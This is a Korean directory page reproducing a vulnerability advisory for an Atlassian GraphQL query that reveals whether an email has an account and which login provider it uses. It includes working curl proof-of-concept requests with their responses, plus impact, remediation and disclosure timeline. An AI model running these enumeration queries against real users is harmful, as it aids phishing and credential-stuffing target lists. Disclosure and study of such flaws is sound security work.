Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-XXXX-atlassian-email-enumeration — CVE-2026-XXXX: Atlassian GraphQL 이메일 열거 오라클 (CWE-204, CVSS 5.3 MEDIUM) | Kitploit
도구/GitHubGitHub/wh4l3x/cve-2026-xxxx-atlassian-email-enumeration
OSINT (Open Source Intelligence)Phishing ToolsReconnaissanceVulnerability AnalysisInformation GatheringWeb SecuritySocial EngineeringEmail Harvesting

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
wh4l3x/cve-2026-xxxx-atlassian-email-enumeration

CVE-2026-XXXX-atlassian-email-enumeration

CVE-2026-XXXX: Atlassian GraphQL 이메일 열거 오라클 (CWE-204, CVSS 5.3 MEDIUM)

저장소 보기
11개월 전아직 검토되지 않음

CVE-2026-XXXX: Atlassian Central GraphQL — 이메일 열거 오라클

제품

Atlassian Central GraphQL Gateway (api.atlassian.com/graphql)

취약점 유형

CWE-204: 관찰 가능한 응답 불일치 — 이메일 열거 오라클

심각도

MEDIUM — CVSS 5.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

설명

Atlassian 중앙 GraphQL 게이트웨이의 loomUnauthenticated_primaryAuthTypeForEmail GraphQL 쿼리는 이메일 주소가 Atlassian에 등록되어 있는지 여부에 따라 서로 다른 응답을 반환하므로, 인증되지 않은 사용자 열거가 가능합니다.

등록된 이메일 → authType(예: workos, password, google) 및 리다이렉트 URI 반환 등록되지 않은 이메일 → 리다이렉트 URI 없이 authType: "none" 반환

인증은 필요하지 않습니다. 쿼리 이름에 "Unauthenticated"가 포함되어 있습니다. 이는 의도적으로 공개된 엔드포인트이지만, 임의의 이메일이 Atlassian 계정을 보유하고 있는지 여부를 누출해서는 안 됩니다.

영향을 받는 버전

  • Atlassian Central GraphQL Gateway (스냅샷 37157, 빌드 2026-07-02)
  • 엔드포인트: https://api.atlassian.com/graphql

개념 증명

등록된 이메일 (인증 제공자 반환):

root@kitploit:~
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType hasActiveMemberships redirectUri } }"}'

응답:

root@kitploit:~
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "workos",
      "hasActiveMemberships": false,
      "redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
    }
  }
}

등록되지 않은 이메일 (none 반환):

root@kitploit:~
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType } }"}'

응답:

root@kitploit:~
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "none"
    }
  }
}

추가 누출: 이메일 → 인증 제공자 매핑

authType: "workos"는 해당 이메일이 WorkOS SSO를 사용함을 확인합니다. authType: "google" 또는 authType: "password"는 인증 방식을 누출합니다. 이를 통해 표적형 피싱이 가능합니다.

영향

인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  • 등록된 Atlassian/Loom 계정을 대규모로 열거
  • 이메일을 해당 인증 제공자(Google SSO, WorkOS, password)에 매핑
  • 인증 제공자 정보를 사용하여 표적형 피싱 캠페인 수행
  • 크리덴셜 스터핑을 위한 유효한 Atlassian 사용자 목록 구축

근본 원인

loomUnauthenticated_primaryAuthTypeForEmail 쿼리는 rate-limiting을 수행하지 않으며 인증 없이도 모든 이메일에 대한 인증 제공자 정보를 반환합니다. 이 엔드포인트는 의도적으로 인증 없이 공개되어 있지만(Loom 가입 흐름용), 이메일에 계정이 있는지 여부와 사용하는 인증 제공자를 누출합니다.

해결 방법

  1. 대량 열거를 방지하기 위해 rate-limiting 추가
  2. 등록된 이메일과 등록되지 않은 이메일 모두에 대해 일관된 응답 반환
  3. 또는: 이메일 상태를 조회하기 전에 CAPTCHA/nonce 요구

이것은 무엇이 아닌가

철저한 테스트 결과, 다음 주장은 기각되었습니다:

  • ❌ 권한이 있는 JWT 토큰 없음 (토큰은 aaid: "unidentified"를 가짐)
  • ❌ 관리자 mutation 실행 없음 (모두 ValidationError로 실패)
  • ❌ 인증 우회 없음 (게이트웨이는 호출자를 unidentified로 올바르게 식별)
  • ❌ 이메일/인증 제공자 매핑 외의 데이터 누출 없음

타임라인

  • 2026-06-30: 발견
  • 2026-06-30: [email protected]에 보고
  • 2026-07-02: 평가 수정 — Critical(9.8)에서 Medium(5.3)으로 하향 조정

발견자

Wh4l3X

도구 다운로드